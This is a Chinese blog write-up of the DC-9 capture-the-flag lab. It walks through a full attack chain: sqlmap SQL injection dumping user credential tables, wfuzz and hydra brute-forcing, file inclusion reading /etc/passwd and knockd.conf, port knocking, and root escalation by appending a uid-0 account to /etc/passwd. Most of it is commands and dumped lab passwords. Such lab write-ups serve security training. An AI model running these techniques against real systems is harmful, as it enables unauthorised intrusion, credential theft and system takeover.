devbox
酷酷是懒虫
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

DC-9 靶场_网络靶场dc-9123网盘

作者:酷酷是懒虫 | 2024-08-16 08:18:53

网络靶场dc-9123网盘

 靶机地址:链接:https://pan.baidu.com/s/1kMLviFtz2JosS422-L1Tgw
提取码:c5ur

 1.主机发现

  1. nmap -sP 192.168.128.1/24
  2. arp-scan -l               #得到IP    192.168.128.131

2.端口扫描

nmap -p 1-65535 -A 192.168.128.131        # 22 80端口

 3.目录扫描

  1. dirb http://192.168.128.131
  2. 或者nikto -host 192.168.128.131    这个查询到了config.php   但是打不开

 4.操作网站找信息

  1. #发现查询点:
  2. 万能密码注入尝试:' or 1=1 -- -
  3. #F12看到是post请求,抓包看到search参数
  4. sqlmap -u "http://192.168.128.131/results.php" --data "search=1" --dbs    查看所有的库名
  5. sqlmap -u "http://192.168.128.131/results.php" --data "search=1" -D users --tables
  6. sqlmap -u "http://192.168.128.131/results.php" --data "search=1" -D users -T UserDetails --columns
  7. sqlmap -u "http://192.168.128.131/results.php" --data "search=1" -D users -T UserDetails --dump
  8. 这里更推荐直接全部dump 
  9. ##notepad可以直接按住alt区域选择复制,这样可以把很多的账密分开做成字典。
  10. #暴力破解:WFuzz
  11. wfuzz -z file,name.txt -z file,password.txt -d "username=FUZZ&password=FUZ2Z" http://192.168.128.131/manage.php #这里POST请求必须使用 -d   
  12. wfuzz -z file,name.txt -z file,passwd.txt --hw 93 -d "username=FUZZ&password=FUZ2Z" http://192.168.128.131/manage.php
  13. wfuzz -z file,name.txt -z file,passwd.txt --hh 1248 -d "username=FUZZ&password=FUZ2Z" http://192.168.128.131/manage.php
  14. #没找到
  15. **#尝试第二个数据库 Staff的信息。**
  16. sqlmap -u "http://192.168.128.131/results.php" --data "search=1" -D Staff -T Users  --dump
  17. #找参数    #尝试了hw hh 的过滤方式,找不到对应的参数。  FUZZ后面带文件名(index.php,etc/passwd等),不带都尝试,考虑是字典还是参数不对。最后,想到回到根目录的   etc/passwd  使用../  
  18. wfuzz -b 'PHPSESSID=in952k2in45a06pcdmht1aepi3' --hw 100 -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.128.131/manage.php?FUZZ=../../../../../../etc/passwd

 5.爆破登录

  1. #看到很多操作系统账号密码。这里爆破操作系统的账号密码。但是并不行
  2. hydra -L name.txt -P passwd.txt 192.168.128.131 ssh  
  3. **#22端口打开了,但是不能连接的原因?**
  4. **1. 防护墙**
  5. **2.所选用户不能使用22端口登录**
  6. **3.linux服务:敲门 Knockd,确认方式:文件位置    /etc/knockd.conf    访问文件看到7469 **
  7. **#用nmap对应敲门,只要访问了,就会打开的端口**
  8. **nmap -p 7469 192.168.128.131**
  9. **nmap -p 8475 192.168.128.131**
  10. **nmap -p 9842 192.168.128.131**
  11. #再次使用hydra爆破:  这里发现保存的字典,不能有任何空格
  12. hydra -L name-dict -P passwd-dict 192.168.128.131 ssh
  13. #登录
  14. ssh janitor@192.168.128.131 输入密码即可
  15. #登录成功还是老操作。看东西:
  16. 1. history
  17. 2. ls -a 
  18. 3。 sudo -l
  19. #发现密码,放到字典。继续hydra爆破:
  20. hydra -L name-dict -P passwd-dict 192.168.128.131 ssh
  21. **#登录成功,重复操作,sudo -l有信息:以root的身份执行操作程序**
  22. ./opt/devstuff/dist/test/test   执行   #python test.py read append   读取内容追加内容的意思
  23. #怎么找test.py的文件位置?
  24. find / - name "test.py" 
  25. find / -name "test.py" 2>/dev/null   # 2代表标准错误输出,过滤到某地
  26. cat /opt/devstuff/test.py

 6.提取

  1. #/etc/passwd的文件格式:密码是x的原因,在/etc/shadow里面,放在etc/passwd也可以
  2. #第三位和第四位的数字是uid和gid,root用户是0 
  3. #第五位是用户描述,第六位是用户的工作目录,第七位命令 解释程序(执行命令的工具)
  4. **这里提取思路:创建一个用户    把uid和gid都设为0即可,加密方式得是hash加密。利用python的脚本,追加到test.py**
  5. openssl passwd  -1 -salt  admin 123456       $1$admin$LClYcRe.ee8dQwgrFc5nz.
  6. 完整的账密应该是:  admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.
  7. admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash    最后的解释脚本目录
  8. 在有权限的用户的下输入  echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
  9. sudo ./test /tmp/passwd  /etc/passwd 
  10. #可以看到新增了一个用户
  11. cat /etc/passwd  
  12. su root
  13. 输入密码

7.笔记本:(记录收集到的信息和思路)

  1. 22/tcp filtered ssh
  2. 80/tcp open     http    Apache httpd 2.4.38 ((Debian))   #有apache   有/var/www目录
  3. 网页主页有一堆个人信息
  4. 目录扫描:
  5. ==> DIRECTORY: http://192.168.128.131/css/                                                                          
  6. ==> DIRECTORY: http://192.168.128.131/includes/   #没用
  7.  
  8. +---------------+-----------+
  9. | password      | username  |
  10. +---------------+-----------+
  11. | 3kfs86sfd     | marym     |
  12. | 468sfdfsd2    | julied    |
  13. | 4sfd87sfd1    | fredf     |
  14. | RocksOff      | barneyr   |
  15. | TC&TheBoyz    | tomc      |
  16. | B8m#48sd      | jerrym    |
  17. | Pebbles       | wilmaf    |
  18. | BamBam01      | bettyr    |
  19. | UrAG0D!       | chandlerb |
  20. | Passw0rd      | joeyt     |
  21. | yN72#dsd      | rachelg   |
  22. | ILoveRachel   | rossg     |
  23. | 3248dsds7s    | monicag   |
  24. | smellycats    | phoebeb   |
  25. | YR3BVxxxw87   | scoots    |
  26. | Ilovepeepee   | janitor   |
  27. | Hawaii-Five-0 | janitor2  |
  28. +---------------+-----------+
  29. 第一个数据库账密不行     换数据库查
  30. admin  transorbital1
  31. 看到一个。。。。**File does not exist  **
  32. **考虑考虑文件包含---》找参数。。**
  33. 这里**注意:在登录时找参数,所以,直接用wfuzz找参数是一个没登陆的状态。带上cookie值,才是以登录的状态查找cookie值**
  34. 参数为     "file"
  35.  
  36. [22][ssh] host: 192.168.128.131   login: chandlerb   password: UrAG0D!
  37. [22][ssh] host: 192.168.128.131   login: joeyt   password: Passw0rd
  38. [22][ssh] host: 192.168.128.131   login: janitor   password: Ilovepeepee
  39. 后面收集到的
  40. login: fredf   password: B4-Tru3-001
  41.  
  42. import sys
  43.  
  44.  
  45. if len (sys.argv) != 3 :
  46.     print ("Usage: python test.py read append")
  47.     sys.exit (1)
  48.  
  49.  
  50. else :
  51.     f = open(sys.argv[1], "r")
  52.     output = (f.read())
  53.  
  54.  
  55.     f = open(sys.argv[2], "a")
  56.     f.write(output)
  57.     f.close()
  58. 读取任意文件内容,追加到任意文件中去
声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:【wpsshop博客】
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号